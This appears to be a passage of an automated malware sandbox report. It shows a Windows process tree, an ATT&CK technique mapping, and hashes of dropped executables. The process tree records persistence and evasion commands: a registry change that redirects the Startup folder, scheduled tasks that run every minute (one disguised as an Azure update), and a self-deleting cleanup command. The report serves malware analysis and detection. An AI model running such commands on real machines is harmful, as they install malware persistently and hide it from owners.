                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                      MaskVPNUpdate.exe /silent
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:6816
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                    PID:5280
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\66FA.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\66FA.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                    PID:7072
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:8816
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:9564
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:9656
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                              PID:8508
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:9456
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C299.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C299.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:10072
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\TdvLJBGrRE.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\TdvLJBGrRE.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:9588
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:10148
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\C299.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4852
                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  PID:4720
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\VCLVzNYMLW.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\VCLVzNYMLW.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:6412
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:8332
                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                  PID:6036
                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                  PID:3204
                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                  PID:6896
                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2804
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:496
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:8452
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:1376
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:5832
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                      PID:6772
                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                      PID:3220
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                      PID:9648
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:4256
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:10052
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:5952
                                                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x2f0
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:6636
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        PID:780

                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                      4
                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                      3
                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1518

                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                      7
                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                      7
                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                      2
                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                      3
                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        8690d4cc29a3c112ee7f6eb3981ac438

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        9e1613d8880a003ac49e52150853673afcd7c8be

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        68c926b002e8f4e0784481ea5b902f0a86991ef47787300c913c17821af510c9

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        4caafb3cc066b7bb366e849117f86b36e5bc5bef48ee66e7a2fbab83c3613fe119946f80524423ccc85434223fd1aefeab472005e0d1f462101ba080c43286f3

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        de586caa1d3fe50c2cea6a61cc9c4ff2

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3cc99581d821c34add364e9cf3483e2f45ba171f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        6f5b5ace8fcec109b1f7875a2b7e3a4fde5d031abfb44ab470481d98e454bc7c

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        f7de78997012727d24f6526f7a09e2cbe9b06caea164c37c7cb649588602a3f28eba809145f750d44dd084f2715198af4aeb026381f2195d48e2107b5db64b39

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HO2sfx2aklmT9oPozX_Gy_AR.exe.log
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PTiTRBrGhbinvK_Lru0QK9TI.exe.log
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wc3Ms_9YilHUMgTZ_22EJV7Q.exe.log
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-4JT4E.tmp\Drsb3GGbTQld7zBl2yQepSES.tmp
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        ffcf263a020aa7794015af0edee5df0b

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5273596.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        3598180fddc06dbd304b76627143b01d

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5273596.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        3598180fddc06dbd304b76627143b01d

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5770928.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        f74c42768182cf95528b4d32db116680

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        c557f307d1d29e0bedb0233361d7605a2e94109a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d09b9025bf28610cb3def1d2c74fae649bb45a4ae8088cd21e65baa8d06d75f0

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        f34d8dbc38c4fa0b5ae8fe3572b0e6428a5acf9494ce9dbe3e9c3c8274f8158c7340b29966221288e56baec22d0bb50dc4404990e413ffa61f0650a6107e953b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5770928.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        f74c42768182cf95528b4d32db116680

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        c557f307d1d29e0bedb0233361d7605a2e94109a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d09b9025bf28610cb3def1d2c74fae649bb45a4ae8088cd21e65baa8d06d75f0

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        f34d8dbc38c4fa0b5ae8fe3572b0e6428a5acf9494ce9dbe3e9c3c8274f8158c7340b29966221288e56baec22d0bb50dc4404990e413ffa61f0650a6107e953b

                                                                                                                                                                                                                      • C:\Users\Admin\Documents\0zm_Y4Dg4qZpVzEQ8s1xl8dC.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        dcb11fa3de5f2d8e38920601724dab09

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        91171eb948a0782461093d900dde3ccb68e33c82

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        041522fa4727bd2bf9b1ad53c7f1401191028504579129e1dd3bce32cc387307

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        577a88d84dbbe38f7e0ccf7ab57074b3f67c28288328eb046bc5b884f1ffe63676736c6d1273d87ab8bfedb287c2030f65b77dd961abd1f1ada6443d99ba0fa1

                                                                                                                                                                                                                      • C:\Users\Admin\Documents\0zm_Y4Dg4qZpVzEQ8s1xl8dC.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        dcb11fa3de5f2d8e38920601724dab09

